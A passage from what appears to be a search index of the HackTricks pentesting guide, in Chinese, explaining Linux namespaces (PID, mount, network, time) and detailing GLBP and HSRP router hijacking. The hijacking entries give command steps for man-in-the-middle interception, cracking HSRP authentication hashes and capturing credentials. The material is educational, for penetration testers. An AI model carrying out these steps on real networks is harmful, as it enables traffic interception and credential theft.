1。/bin/bash 及其子进程随后安全地包含在这个新命名空间中,防止 PID 1 提前退出,并允许正常的 PID 分配。 通过确保 unshare 以 -f 标志运行,新的 PID 命名空间得以正确维护,使得 /bin/bash 及其子进程能够正常运行而不会遇到内存分配错误。 通过挂载新的 /proc 文件系统实例,如果使用参数 --mount-proc,您可以确保新的挂载命名空间具有 特定于该命名空间的进程信息的准确和隔离的视图 。 Docker bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID Namespace » 创建不同的命名空间","id":"1695","title":"创建不同的命名空间"},"1696":{"body":"bash ls -l /proc/self/ns/pid\\nlrwxrwxrwx 1 root root 0 Apr 3 18:45 /proc/self/ns/pid -> \'pid:[4026532412]\'","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID Namespace » 检查您的进程所在的命名空间","id":"1696","title":"检查您的进程所在的命名空间"},"1697":{"body":"bash sudo find /proc -maxdepth 3 -type l -name pid -exec readlink {} \\\\; 2>/dev/null | sort -u 注意,初始(默认)PID 命名空间中的 root 用户可以看到所有进程,包括新 PID 命名空间中的进程,这就是我们可以看到所有 PID 命名空间的原因。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID Namespace » 查找所有 PID 
命名空间","id":"1697","title":"查找所有 PID 命名空间"},"1698":{"body":"bash nsenter -t TARGET_PID --pid /bin/bash 当你从默认命名空间进入一个 PID 命名空间时,你仍然能够看到所有的进程。而来自该 PID 命名空间的进程将能够看到新的 bash 进程。 此外,你只能 在你是 root 的情况下进入另一个进程的 PID 命名空间 。并且你 不能 进入 其他命名空间 而没有指向它的描述符 (如 /proc/self/ns/pid)","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID Namespace » 进入 PID 命名空间","id":"1698","title":"进入 PID 命名空间"},"1699":{"body":"https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID Namespace » References","id":"1699","title":"References"},"17":{"body":"Reading time: 11 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"HackTricks Values & FAQ » HackTricks 值观与常见问题","id":"17","title":"HackTricks 值观与常见问题"},"170":{"body":"攻击者可以通过发送优先级值最高(255)的GLBP数据包成为主路由器。这可能导致DoS或MITM攻击,从而允许流量拦截或重定向。","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » GLBP Attack Mechanism","id":"170","title":"GLBP Attack Mechanism"},"1700":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 
加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » Mount Namespace","id":"1700","title":"Mount Namespace"},"1701":{"body":"挂载命名空间是一个Linux内核特性,它提供了一个进程组所看到的文件系统挂载点的隔离。每个挂载命名空间都有自己的一组文件系统挂载点, 对一个命名空间中挂载点的更改不会影响其他命名空间 。这意味着在不同挂载命名空间中运行的进程可以对文件系统层次结构有不同的视图。 挂载命名空间在容器化中特别有用,其中每个容器应该有自己的文件系统和配置,与其他容器和主机系统隔离。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » 基本信息","id":"1701","title":"基本信息"},"1702":{"body":"当创建一个新的挂载命名空间时,它会用 来自其父命名空间的挂载点的副本 进行初始化。这意味着在创建时,新的命名空间与其父命名空间共享相同的文件系统视图。然而,命名空间内的任何后续挂载点更改将不会影响父命名空间或其他命名空间。 当一个进程在其命名空间内修改挂载点,例如挂载或卸载文件系统时, 更改仅限于该命名空间 ,不会影响其他命名空间。这允许每个命名空间拥有自己的独立文件系统层次结构。 进程可以使用setns()系统调用在命名空间之间移动,或使用带有CLONE_NEWNS标志的unshare()或clone()系统调用创建新的命名空间。当一个进程移动到一个新命名空间或创建一个新命名空间时,它将开始使用与该命名空间关联的挂载点。 文件描述符和inode在命名空间之间是共享的 ,这意味着如果一个命名空间中的进程有一个指向文件的打开文件描述符,它可以 将该文件描述符传递给另一个命名空间中的进程 ,并且 两个进程将访问同一个文件 。然而,由于挂载点的差异,文件的路径在两个命名空间中可能并不相同。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » 工作原理:","id":"1702","title":"工作原理:"},"1703":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » 实验:","id":"1703","title":"实验:"},"1704":{"body":"CLI bash sudo unshare -m [--mount-proc] /bin/bash 通过挂载新的 /proc 文件系统实例,如果使用参数 --mount-proc,您可以确保新的挂载命名空间具有 特定于该命名空间的进程信息的准确和隔离的视图 。 错误:bash: fork: 无法分配内存 当 unshare 在没有 -f 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: 问题解释 : Linux 内核允许进程使用 unshare 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 \\"unshare\\" 进程)并不会进入新的命名空间;只有它的子进程会进入。 运行 %unshare -p /bin/bash% 会在与 unshare 相同的进程中启动 /bin/bash。因此,/bin/bash 及其子进程位于原始 PID 命名空间中。 新命名空间中 /bin/bash 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 后果 : 新命名空间中 PID 1 的退出导致 PIDNS_HASH_ADDING 标志的清理。这导致 alloc_pid 函数在创建新进程时无法分配新的 PID,从而产生 
\\"无法分配内存\\" 的错误。 解决方案 : 通过在 unshare 中使用 -f 选项可以解决此问题。此选项使 unshare 在创建新的 PID 命名空间后分叉一个新进程。 执行 %unshare -fp /bin/bash% 确保 unshare 命令本身在新的命名空间中成为 PID 1。然后,/bin/bash 及其子进程安全地包含在这个新命名空间中,防止 PID 1 的过早退出,并允许正常的 PID 分配。 通过确保 unshare 以 -f 标志运行,新的 PID 命名空间得以正确维护,使得 /bin/bash 及其子进程能够正常运行而不会遇到内存分配错误。 Docker bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » 创建不同的命名空间","id":"1704","title":"创建不同的命名空间"},"1705":{"body":"bash ls -l /proc/self/ns/mnt\\nlrwxrwxrwx 1 root root 0 Apr 4 20:30 /proc/self/ns/mnt -> \'mnt:[4026531841]\'","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » 检查您的进程所在的命名空间","id":"1705","title":"检查您的进程所在的命名空间"},"1706":{"body":"bash sudo find /proc -maxdepth 3 -type l -name mnt -exec readlink {} \\\\; 2>/dev/null | sort -u\\n# Find the processes with an specific namespace\\nsudo find /proc -maxdepth 3 -type l -name mnt -exec ls -l {} \\\\; 2>/dev/null | grep bash findmnt","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » 查找所有挂载命名空间","id":"1706","title":"查找所有挂载命名空间"},"1707":{"body":"bash nsenter -m TARGET_PID --pid /bin/bash 此外,您只能 进入另一个进程命名空间,如果您是 root 。并且您 不能 在没有指向它的描述符的情况下 进入 其他命名空间(例如 /proc/self/ns/mnt)。 因为新挂载仅在命名空间内可访问,所以命名空间可能包含只能从中访问的敏感信息。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » 进入挂载命名空间","id":"1707","title":"进入挂载命名空间"},"1708":{"body":"bash # Generate new mount ns\\nunshare -m /bin/bash\\nmkdir /tmp/mount_ns_example\\nmount -t tmpfs tmpfs /tmp/mount_ns_example\\nmount | grep tmpfs # \\"tmpfs on /tmp/mount_ns_example\\"\\necho test > /tmp/mount_ns_example/test\\nls /tmp/mount_ns_example/test # Exists # From the host\\nmount | grep tmpfs # Cannot see \\"tmpfs on /tmp/mount_ns_example\\"\\nls /tmp/mount_ns_example/test # Doesn\'t exist # findmnt # List existing mounts\\nTARGET SOURCE FSTYPE OPTIONS\\n/ 
/dev/mapper/web05--vg-root # unshare --mount # run a shell in a new mount namespace\\n# mount --bind /usr/bin/ /mnt/\\n# ls /mnt/cp\\n/mnt/cp\\n# exit # exit the shell, and hence the mount namespace\\n# ls /mnt/cp\\nls: cannot access \'/mnt/cp\': No such file or directory ## Notice there\'s different files in /tmp\\n# ls /tmp\\nrevshell.elf # ls /mnt/tmp\\nkrb5cc_75401103_X5yEyy\\nsystemd-private-3d87c249e8a84451994ad692609cd4b6-apache2.service-77w9dT\\nsystemd-private-3d87c249e8a84451994ad692609cd4b6-systemd-resolved.service-RnMUhT\\nsystemd-private-3d87c249e8a84451994ad692609cd4b6-systemd-timesyncd.service-FAnDql\\nvmware-root_662-2689143848","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » 挂载某些内容","id":"1708","title":"挂载某些内容"},"1709":{"body":"https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory https://unix.stackexchange.com/questions/464033/understanding-how-mount-namespaces-work-in-linux tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount Namespace » 参考","id":"1709","title":"参考"},"171":{"body":"Loki 可以通过注入优先级和权重设置为255的数据包来执行GLBP攻击。攻击前的步骤包括使用Wireshark等工具收集虚拟IP地址、身份验证存在性和路由器优先级值等信息。 攻击步骤: 切换到混杂模式并启用IP转发。 确定目标路由器并获取其IP。 生成一个无偿ARP。 注入一个恶意GLBP数据包,冒充AVG。 为攻击者的网络接口分配一个次要IP地址,镜像GLBP虚拟IP。 实施SNAT以实现完整的流量可见性。 调整路由以确保通过原始AVG路由器继续访问互联网。 通过遵循这些步骤,攻击者将自己定位为“中间人”,能够拦截和分析网络流量,包括未加密或敏感数据。 为了演示,以下是所需的命令片段: bash # Enable promiscuous mode and IP forwarding\\nsudo ip link set eth0 promisc on\\nsudo sysctl -w net.ipv4.ip_forward=1 # Configure secondary IP and SNAT\\nsudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0\\nsudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Adjust routing\\nsudo route del default\\nsudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 监控和拦截流量可以使用 net-creds.py 或类似工具来捕获和分析流经被攻陷网络的数据。","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » Executing a GLBP Attack with Loki","id":"171","title":"Executing a GLBP Attack with Loki"},"1710":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network Namespace » 网络命名空间","id":"1710","title":"网络命名空间"},"1711":{"body":"网络命名空间是一个Linux内核特性,提供网络栈的隔离,允许 每个网络命名空间拥有自己的独立网络配置 、接口、IP地址、路由表和防火墙规则。这种隔离在各种场景中非常有用,例如容器化,其中每个容器应具有自己的网络配置,与其他容器和主机系统独立。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network Namespace » 基本信息","id":"1711","title":"基本信息"},"1712":{"body":"当创建一个新的网络命名空间时,它将以 完全隔离的网络栈 开始,除了回环接口(lo)外 没有网络接口 。这意味着在新的网络命名空间中运行的进程默认无法与其他命名空间或主机系统中的进程通信。 虚拟网络接口 ,如veth对,可以在网络命名空间之间创建和移动。这允许在命名空间之间或命名空间与主机系统之间建立网络连接。例如,veth对的一端可以放置在容器的网络命名空间中,另一端可以连接到主机命名空间中的 桥接 或其他网络接口,为容器提供网络连接。 命名空间内的网络接口可以拥有 自己的IP地址、路由表和防火墙规则 ,与其他命名空间独立。这允许不同网络命名空间中的进程具有不同的网络配置,并像在独立的网络系统上运行一样操作。 进程可以使用setns()系统调用在命名空间之间移动,或使用带有CLONE_NEWNET标志的unshare()或clone()系统调用创建新的命名空间。当进程移动到新的命名空间或创建一个时,它将开始使用与该命名空间关联的网络配置和接口。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network Namespace » 工作原理:","id":"1712","title":"工作原理:"},"1713":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network Namespace » 实验:","id":"1713","title":"实验:"},"1714":{"body":"CLI bash sudo unshare -n [--mount-proc] /bin/bash\\n# Run ifconfig or ip -a 通过挂载新的 /proc 文件系统实例,如果使用参数 --mount-proc,您可以确保新的挂载命名空间具有 特定于该命名空间的进程信息的准确和隔离的视图 。 错误:bash: fork: 无法分配内存 当 unshare 在没有 -f 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: 问题说明 : Linux 内核允许进程使用 unshare 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 \\"unshare\\" 进程)并不会进入新的命名空间;只有它的子进程会进入。 运行 %unshare -p /bin/bash% 会在与 unshare 相同的进程中启动 /bin/bash。因此,/bin/bash 及其子进程位于原始 PID 命名空间中。 新命名空间中 /bin/bash 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 后果 : 新命名空间中 PID 1 的退出导致 PIDNS_HASH_ADDING 标志的清理。这导致 alloc_pid 函数在创建新进程时无法分配新的 PID,从而产生 \\"无法分配内存\\" 的错误。 解决方案 : 通过在 unshare 中使用 -f 选项可以解决此问题。此选项使 unshare 在创建新的 PID 命名空间后分叉一个新进程。 执行 %unshare -fp /bin/bash% 确保 unshare 命令本身在新命名空间中成为 
PID 1。然后,/bin/bash 及其子进程安全地包含在这个新命名空间中,防止 PID 1 提前退出,并允许正常的 PID 分配。 通过确保 unshare 以 -f 标志运行,新的 PID 命名空间得以正确维护,使得 /bin/bash 及其子进程能够正常运行而不会遇到内存分配错误。 Docker bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash\\n# Run ifconfig or ip -a","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network Namespace » 创建不同的命名空间","id":"1714","title":"创建不同的命名空间"},"1715":{"body":"bash ls -l /proc/self/ns/net\\nlrwxrwxrwx 1 root root 0 Apr 4 20:30 /proc/self/ns/net -> \'net:[4026531840]\'","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network Namespace » 检查您的进程所在的命名空间","id":"1715","title":"检查您的进程所在的命名空间"},"1716":{"body":"bash sudo find /proc -maxdepth 3 -type l -name net -exec readlink {} \\\\; 2>/dev/null | sort -u | grep \\"net:\\"\\n# Find the processes with an specific namespace\\nsudo find /proc -maxdepth 3 -type l -name net -exec ls -l {} \\\\; 2>/dev/null | grep ","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network Namespace » 查找所有网络命名空间","id":"1716","title":"查找所有网络命名空间"},"1717":{"body":"bash nsenter -n TARGET_PID --pid /bin/bash 您只能 以 root 身份进入另一个进程命名空间 。并且您 不能 在没有指向它的描述符的情况下 进入 其他命名空间(例如 /proc/self/ns/net)。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network Namespace » 进入网络命名空间","id":"1717","title":"进入网络命名空间"},"1718":{"body":"https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network Namespace » References","id":"1718","title":"References"},"1719":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 时间命名空间","id":"1719","title":"时间命名空间"},"172":{"body":"HSRP(热备份路由器/冗余协议)概述 HSRP 是一种思科专有协议,旨在实现网络网关冗余。它允许将多个物理路由器配置为一个共享 IP 地址的单一逻辑单元。该逻辑单元由一个主要路由器管理,负责流量的引导。与使用优先级和权重进行负载均衡的 GLBP 不同,HSRP 依赖于单个活动路由器进行流量管理。 HSRP 中的角色和术语 HSRP 活动路由器 :作为网关的设备,管理流量流动。 HSRP 备用路由器 :准备接管活动路由器故障时的备份路由器。 HSRP 组 :一组路由器协作形成一个单一的弹性虚拟路由器。 HSRP MAC 地址 :在 HSRP 设置中分配给逻辑路由器的虚拟 MAC 地址。 HSRP 虚拟 IP 地址 :HSRP 组的虚拟 IP 地址,作为连接设备的默认网关。 HSRP 版本 HSRP 有两个版本,HSRPv1 和 HSRPv2,主要在组容量、多播 IP 使用和虚拟 MAC 地址结构上有所不同。该协议利用特定的多播 IP 地址进行服务信息交换,每 3 秒发送一次 Hello 数据包。如果在 10 秒内未收到数据包,则假定路由器处于非活动状态。 HSRP 攻击机制 HSRP 攻击涉及通过注入最大优先级值强行接管活动路由器的角色。这可能导致中间人(MITM)攻击。攻击前的基本步骤包括收集有关 HSRP 设置的数据,可以使用 Wireshark 进行流量分析。 绕过 HSRP 身份验证的步骤 将包含 HSRP 数据的网络流量保存为 .pcap 文件。 shell tcpdump -w hsrp_traffic.pcap 使用 hsrp2john.py 从 .pcap 文件中提取 MD5 哈希。 shell python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes 使用 John the Ripper 破解 MD5 哈希。 shell john --wordlist=mywordlist.txt hsrp_hashes 使用 Loki 执行 HSRP 注入 启动 Loki 以识别 HSRP 广告。 将网络接口设置为混杂模式并启用 IP 转发。 shell sudo ip link set eth0 promisc on\\nsudo sysctl -w net.ipv4.ip_forward=1 使用 Loki 针对特定路由器,输入破解的 HSRP 密码,并执行必要的配置以冒充活动路由器。 在获得活动路由器角色后,配置您的网络接口和 IP 表以拦截合法流量。 shell sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0\\nsudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE 修改路由表以通过前活动路由器路由流量。 shell sudo route del default\\nsudo route add 
-net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 使用 net-creds.py 或类似工具从拦截的流量中捕获凭据。 shell sudo python2 net-creds.py -i eth0 执行这些步骤使攻击者能够拦截和操纵流量,类似于 GLBP 劫持的过程。这突显了 HSRP 等冗余协议的脆弱性以及对强大安全措施的需求。","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » HSRP 劫持的被动解释与命令细节","id":"172","title":"HSRP 劫持的被动解释与命令细节"},"1720":{"body":"Linux中的时间命名空间允许对系统单调时钟和启动时间时钟进行每个命名空间的偏移。它通常在Linux容器中使用,以更改容器内的日期/时间,并在从检查点或快照恢复后调整时钟。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 基本信息","id":"1720","title":"基本信息"},"1721":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 实验:","id":"1721","title":"实验:"},"1722":{"body":"CLI bash sudo unshare -T [--mount-proc] /bin/bash 通过挂载新的 /proc 文件系统实例,如果使用参数 --mount-proc,您可以确保新的挂载命名空间具有 特定于该命名空间的进程信息的准确和隔离视图 。 错误:bash: fork: 无法分配内存 当 unshare 在没有 -f 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: 问题说明 : Linux 内核允许进程使用 unshare 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 \\"unshare\\" 进程)并不会进入新的命名空间;只有它的子进程会进入。 运行 %unshare -p /bin/bash% 会在与 unshare 相同的进程中启动 /bin/bash。因此,/bin/bash 及其子进程位于原始 PID 命名空间中。 新命名空间中 /bin/bash 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 后果 : 新命名空间中 PID 1 的退出导致 PIDNS_HASH_ADDING 标志的清理。这导致 alloc_pid 函数在创建新进程时无法分配新的 PID,从而产生 \\"无法分配内存\\" 的错误。 解决方案 : 通过在 unshare 中使用 -f 选项可以解决此问题。此选项使 unshare 在创建新的 PID 命名空间后分叉一个新进程。 执行 %unshare -fp /bin/bash% 确保 unshare 命令本身在新命名空间中成为 PID 1。然后,/bin/bash 及其子进程安全地包含在这个新命名空间中,防止 PID 1 提前退出,并允许正常的 PID 分配。 通过确保 unshare 以 -f 标志运行,新的 PID 命名空间得以正确维护,使得 /bin/bash 及其子进程能够正常运行而不会遇到内存分配错误。 Docker bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 创建不同的命名空间","id":"1722","title":"创建不同的命名空间"},"1723":{"body":"bash ls -l /proc/self/ns/time\\nlrwxrwxrwx 1 root root 0 Apr 4 21:16 /proc/self/ns/time -> \'time:[4026531834]\'","breadcrumbs":"Linux Privilege Escalation » 
Docker Security » Namespaces » Time Namespace » 检查您的进程所在的命名空间","id":"1723","title":"检查您的进程所在的命名空间"},"1724":{"body":"bash sudo find /proc -maxdepth 3 -type l -name time -exec readlink {} \\\\; 2>/dev/null | sort -u\\n# Find the processes with an specific namespace\\nsudo find /proc -maxdepth 3 -type l -name time -exec ls -l {} \\\\; 2>/dev/null | grep ","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 查找所有时间命名空间","id":"1724","title":"查找所有时间命名空间"},"1725":{"body":"bash nsenter -T TARGET_PID --pid /bin/bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 进入时间命名空间","id":"1725","title":"进入时间命名空间"},"1726":{"body":"从 Linux 5.6 开始,每个时间命名空间可以虚拟化两个时钟: CLOCK_MONOTONIC CLOCK_BOOTTIME 它们的每个命名空间的增量通过文件 /proc//timens_offsets 暴露(并可以被修改): $ sudo unshare -Tr --mount-proc bash # -T creates a new timens, -r drops capabilities\\n$ cat /proc/$$/timens_offsets\\nmonotonic 0\\nboottime 0 该文件包含两行 - 每个时钟一行 - 以 纳秒 为单位的偏移量。持有 CAP_SYS_TIME _在时间命名空间_中的进程可以更改该值: # advance CLOCK_MONOTONIC by two days (172 800 s)\\necho \\"monotonic 172800000000000\\" > /proc/$$/timens_offsets\\n# verify\\n$ cat /proc/$$/uptime # first column uses CLOCK_MONOTONIC\\n172801.37 13.57 如果您需要墙上时钟(CLOCK_REALTIME)也发生变化,您仍然必须依赖经典机制(date、hwclock、chronyd等);它 不是 命名空间化的。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 操作时间偏移","id":"1726","title":"操作时间偏移"},"1727":{"body":"sudo unshare -T \\\\\\n--monotonic=\\"+24h\\" \\\\\\n--boottime=\\"+7d\\" \\\\\\n--mount-proc \\\\\\nbash 长选项会在命名空间创建后自动将所选的增量写入 timens_offsets,省去了手动 echo 的步骤。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » unshare(1) 辅助标志 (util-linux ≥ 2.38)","id":"1727","title":"unshare(1) 辅助标志 (util-linux ≥ 2.38)"},"1728":{"body":"OCI Runtime Specification v1.1 (2023年11月)增加了专用的 time 命名空间类型和 linux.timeOffsets 字段,以便容器引擎可以以可移植的方式请求时间虚拟化。 runc >= 1.2.0 实现了该规范的这一部分。一个最小的 config.json 片段如下所示: json 
{\\n\\"linux\\": {\\n\\"namespaces\\": [\\n{\\"type\\": \\"time\\"}\\n],\\n\\"timeOffsets\\": {\\n\\"monotonic\\": 86400,\\n\\"boottime\\": 600\\n}\\n}\\n} 然后使用 runc run 运行容器。 注意:runc 1.2.6 (2025年2月)修复了一个“使用私有 timens 执行到容器中”的错误,该错误可能导致挂起和潜在的拒绝服务。确保在生产环境中使用 ≥ 1.2.6。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » OCI 和运行时支持","id":"1728","title":"OCI 和运行时支持"},"1729":{"body":"所需能力 – 进程需要在其用户/时间命名空间内具有 CAP_SYS_TIME 才能更改偏移量。在容器中删除该能力(Docker 和 Kubernetes 的默认设置)可以防止篡改。 无墙钟时间更改 – 由于 CLOCK_REALTIME 与主机共享,攻击者无法仅通过 timens 来伪造证书生命周期、JWT 过期等。 日志/检测规避 – 依赖于 CLOCK_MONOTONIC 的软件(例如基于正常运行时间的速率限制器)如果命名空间用户调整偏移量可能会感到困惑。对于安全相关的时间戳,优先使用 CLOCK_REALTIME。 内核攻击面 – 即使删除了 CAP_SYS_TIME,内核代码仍然可访问;保持主机补丁更新。Linux 5.6 → 5.12 收到了多个 timens 的错误修复(NULL-deref,符号问题)。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 安全考虑","id":"1729","title":"安全考虑"},"173":{"body":"https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » 参考文献","id":"173","title":"参考文献"},"1730":{"body":"在容器运行时默认配置中删除 CAP_SYS_TIME。 保持运行时更新(runc ≥ 1.2.6,crun ≥ 1.12)。 如果依赖于 --monotonic/--boottime 辅助工具,请固定 util-linux ≥ 2.38。 审计读取 uptime 或 CLOCK_MONOTONIC 的容器内软件,以确保安全关键逻辑。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 加固检查清单","id":"1730","title":"加固检查清单"},"1731":{"body":"man7.org – 时间命名空间手册页: https://man7.org/linux/man-pages/man7/time_namespaces.7.html OCI 博客 – “OCI v1.1:新的时间和 RDT 命名空间”(2023年11月15日): https://opencontainers.org/blog/2023/11/15/oci-spec-v1.1 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » 